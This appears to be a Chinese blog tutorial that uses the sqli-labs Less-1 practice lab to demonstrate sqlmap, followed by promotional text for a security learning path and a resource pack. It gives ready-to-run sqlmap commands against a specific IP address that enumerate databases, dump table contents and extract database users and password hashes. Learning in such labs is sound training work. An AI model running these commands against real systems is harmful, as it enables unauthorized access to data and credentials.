原来sql注入如此简单
以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
一、判断是否存在注入点
使用命令:
使用命令:sqlmap -u “http://49.232.78.252:83/Less-1/?id=1”
有图中白色背景的 则判断出有注入点
二、查询当前用户下所有数据库
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” --dbs
可以看到有五个表
三、获取数据库中的表名
选取一个challenges数据库,获取此库的表名
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges --tables
四、获取表中的字段名
选取表T5M0QG6FM2,获取其中字段名
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges -T T5M0QG6FM2 –columns
五、获取字段内容
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges -T T5M0QG6FM2 --columns –dump
六、获取数据库的所有用户
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –users
使用该命令就可以列出所有管理用户
七、获取数据库用户的密码
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –passwords
八、获取当前网站数据库的名称
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” --current-db
可以看到当前的数据库是 security
九、获取当前网站数据库的用户名称
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” --current-user
当前用户是root
网络安全成长路线图
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成hei客大神,这个方向越往后,需要学习和掌握的东西就会越来越多,以下是学习网络安全需要走的方向:
网络安全学习方法
上面介绍了技术分类和学习路线,这里来谈一下学习方法:
视频学习
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!